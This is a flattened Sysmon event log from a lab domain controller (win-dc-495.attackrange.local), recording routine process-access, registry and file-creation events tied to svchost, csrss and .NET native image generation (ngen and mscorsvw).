13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000007508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:49:39.620{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda0-0xc4328f26) 11241100x80000000000000007528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:40.526{59A5CD1D-91EA-6005-3A03-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12f8-0\PresentationFramework.dll2021-01-18 13:49:40.526 10341000x80000000000000007538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:41.573{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91F5-6005-3D03-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:41.557{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91F5-6005-3D03-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 
10341000x80000000000000007536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:41.557{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91F5-6005-3D03-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:41.495{59A5CD1D-91F5-6005-3C03-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1154-0\PresentationFramework.Aero2.dll2021-01-18 13:49:41.495 
10341000x80000000000000007534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:41.167{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91F5-6005-3C03-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:41.167{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91F5-6005-3C03-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:41.167{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91F5-6005-3C03-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:41.058{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91F5-6005-3B03-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:41.042{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91F5-6005-3B03-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:41.042{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91F5-6005-3B03-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:42.932{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91F6-6005-3E03-00000000A301}920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:42.917{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91F6-6005-3E03-00000000A301}920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:42.917{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91F6-6005-3E03-00000000A301}920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.979{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91F8-6005-4103-00000000A301}4304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:44.979{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91F8-6005-4103-00000000A301}4304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:44.932{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91F8-6005-4003-00000000A301}4656C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 